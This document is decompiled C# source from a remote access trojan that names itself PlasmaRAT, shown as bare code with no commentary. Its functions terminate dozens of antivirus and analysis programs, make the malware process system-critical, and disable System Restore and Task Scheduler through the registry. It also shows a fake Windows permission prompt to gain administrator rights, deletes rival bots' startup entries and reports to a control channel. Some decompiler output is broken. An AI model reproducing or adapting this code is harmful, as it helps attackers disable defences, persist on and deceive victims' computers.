// Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320 public static void Start() { try { if (!AntiEverything.IsAdmin()) { CheckAV.RunAVAdminMode(); } else { AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA")); AVKill.ProtectMyFile(); AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)); AVKill.AVProcSearcher(); AVKill.FuckFileName("rstrui.exe"); AVKill.FuckFileName("AvastSvc.exe"); AVKill.FuckFileName("avconfig.exe"); AVKill.FuckFileName("AvastUI.exe"); AVKill.FuckFileName("avscan.exe"); AVKill.FuckFileName("instup.exe"); AVKill.FuckFileName("mbam.exe"); AVKill.FuckFileName("mbamgui.exe"); AVKill.FuckFileName("mbampt.exe"); AVKill.FuckFileName("mbamscheduler.exe"); AVKill.FuckFileName("mbamservice.exe"); AVKill.FuckFileName("hijackthis.exe"); AVKill.FuckFileName("spybotsd.exe"); AVKill.FuckFileName("ccuac.exe"); AVKill.FuckFileName("avcenter.exe"); AVKill.FuckFileName("avguard.exe"); AVKill.FuckFileName("avgnt.exe"); AVKill.FuckFileName("avgui.exe"); AVKill.FuckFileName("avgcsrvx.exe"); AVKill.FuckFileName("avgidsagent.exe"); AVKill.FuckFileName("avgrsx.exe"); AVKill.FuckFileName("avgwdsvc.exe"); AVKill.FuckFileName("egui.exe"); AVKill.FuckFileName("zlclient.exe"); AVKill.FuckFileName("bdagent.exe"); AVKill.FuckFileName("keyscrambler.exe"); AVKill.FuckFileName("avp.exe"); AVKill.FuckFileName("wireshark.exe"); AVKill.FuckFileName("ComboFix.exe"); AVKill.FuckFileName("MSASCui.exe"); AVKill.FuckFileName("MpCmdRun.exe"); AVKill.FuckFileName("msseces.exe"); AVKill.FuckFileName("MsMpEng.exe"); AVKill.FuckFileName("blindman.exe"); AVKill.FuckFileName("SDFiles.exe"); AVKill.FuckFileName("SDMain.exe"); AVKill.FuckFileName("SDWinSec.exe"); } } catch (Exception ex) { } }
// Token: 0x060000D0 RID: 208 RVA: 0x0000C0C4 File Offset: 0x0000A2C4 public static void NonCriticalProcess() { int num; int num5; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (!PlasmaRAT.WhatToRun.Contains("c")) { goto IL_3C; } IL_1A: num2 = 3; if (!AntiEverything.IsAdmin()) { goto IL_3C; } IL_23: num2 = 4; IntPtr handle = Process.GetCurrentProcess().Handle; int processInformationClass = 29; int num3 = 0; SetProcCritical.NtSetInformationProcess(handle, processInformationClass, ref num3, 4); IL_3C: goto IL_A7; IL_3E: int num4 = num5 + 1; num5 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num4); IL_68: goto IL_9C; IL_6A: num5 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_7A :; } catch when(endfilter(obj is Exception & num != 0 & num5 == 0)) { Exception ex = (Exception)obj2; goto IL_6A; } IL_9C: throw ProjectData.CreateProjectError(-2146828237); IL_A7: if (num5 != 0) { ProjectData.ClearProjectError(); } }
// Token: 0x060000CF RID: 207 RVA: 0x0000BFFC File Offset: 0x0000A1FC public static void CriticalProcess() { int num; int num5; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (!AntiEverything.IsAdmin()) { goto IL_3C; } IL_10: num2 = 3; SystemEvents.SessionEnding += delegate(object sender, SessionEndingEventArgs e) { SetProcCritical.NonCriticalProcess(); }; IL_23: num2 = 4; IntPtr handle = Process.GetCurrentProcess().Handle; int processInformationClass = 29; int num3 = 1; SetProcCritical.NtSetInformationProcess(handle, processInformationClass, ref num3, 4); IL_3C: goto IL_A3; IL_3E: int num4 = num5 + 1; num5 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num4); IL_64: goto IL_98; IL_66: num5 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_76 :; } catch when(endfilter(obj is Exception & num != 0 & num5 == 0)) { Exception ex = (Exception)obj2; goto IL_66; } IL_98: throw ProjectData.CreateProjectError(-2146828237); IL_A3: if (num5 != 0) { ProjectData.ClearProjectError(); } }
// Token: 0x06000086 RID: 134 RVA: 0x00008988 File Offset: 0x00006B88 public static void Disable() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "ShowSuperHidden", "0", RegistryValueKind.DWord); IL_28: num2 = 3; if (!AntiEverything.IsAdmin()) { goto IL_94; } IL_31: num2 = 4; MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Script Host\\Settings", "REG_DWORD", "1", RegistryValueKind.DWord); IL_52: num2 = 5; MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule", "Start", "4", RegistryValueKind.DWord); IL_73: num2 = 6; MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord); IL_94: goto IL_103; IL_96: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_C4: goto IL_F8; IL_C6: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_D6 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_C6; } IL_F8: throw ProjectData.CreateProjectError(-2146828237); IL_103: if (num4 != 0) { ProjectData.ClearProjectError(); } }
// Token: 0x06000043 RID: 67 RVA: 0x00004C78 File Offset: 0x00002E78 public static void RunAVAdminMode() { try { string text = Path.GetTempPath() + "HardwareCheck.exe"; if (!AntiEverything.IsAdmin() && Operators.CompareString(PlasmaRAT.GetAntiVirus(), "AntiVirus: N/A", false) != 0 && Operators.CompareString(Interaction.GetSetting("Microsoft", "Sysinternals", "AV", ""), "ran", false) != 0) { if (!File.Exists(text)) { File.Copy(Application.ExecutablePath, text); } ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe", string.Concat(new string[] { "/c ", text, "\r\n\r\n Windows has detected a recent software change and needs permissions to continue. This process will take about 30-60 seconds depending on your internet connection. Please hit Yes to continue.\r\n\r\nSystem Info:\r\nAccount: ", Environment.UserName.ToString().ToString(), "\r\nProcessor Count: ", Environment.ProcessorCount.ToString(), "\r\nOperating System: ", MyProject.Computer.Info.OSFullName })); processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.UseShellExecute = true; processStartInfo.WorkingDirectory = Environment.CurrentDirectory; processStartInfo.Verb = "runas"; try { Process.Start(processStartInfo); Interaction.SaveSetting("Microsoft", "Sysinternals", "AV", "ran"); PlasmaRAT.TalktoChannel("AV Killer: Targeted " + PlasmaRAT.GetAntiVirus(), string.Empty); } catch (Exception ex) { } } } catch (Exception ex2) { } }
// Token: 0x0600005C RID: 92 RVA: 0x0000602C File Offset: 0x0000422C public static object HardBotKill() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (AntiEverything.AntisDetected) { goto IL_AB; } IL_13: num2 = 3; BotKillers.RunStartupKiller(); IL_1A: num2 = 4; HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true)); IL_32: num2 = 5; HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true)); IL_4A: num2 = 6; BotKillers.KillFile(Environment.GetFolderPath(Environment.SpecialFolder.Startup)); IL_57: num2 = 7; if (!AntiEverything.IsAdmin()) { goto IL_91; } IL_60: num2 = 8; HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true)); IL_78: num2 = 9; HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true)); IL_91: num2 = 11; BotKillers.ScanProcess(); IL_99: num2 = 12; PlasmaRAT.TalktoChannel("BK: Hard Bot Killer Ran Successfully!", string.Empty); IL_AB: goto IL_135; IL_B0: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_F6: goto IL_12A; IL_F8: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_108 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_F8; } IL_12A: throw ProjectData.CreateProjectError(-2146828237); IL_135: object obj3; object result = obj3; if (num4 != 0) { ProjectData.ClearProjectError(); } return(result); }
// Token: 0x06000058 RID: 88 RVA: 0x00005C48 File Offset: 0x00003E48 public static void RunStartupKiller() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 1); IL_14: num2 = 3; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 1); IL_21: num2 = 4; if (!AntiEverything.IsAdmin()) { goto IL_44; } IL_2A: num2 = 5; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 2); IL_37: num2 = 6; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 2); IL_44: num2 = 8; string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup)); IL_52: num2 = 9; string[] array = files; int i = 0; while (i < array.Length) { string location = array[i]; IL_66: num2 = 10; BotKillers.KillFile(location); i++; IL_76: num2 = 11; } IL_80: goto IL_106; IL_85: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_C5: goto IL_FB; IL_C7: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_D8 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_C7; } IL_FB: throw ProjectData.CreateProjectError(-2146828237); IL_106: if (num4 != 0) { ProjectData.ClearProjectError(); } }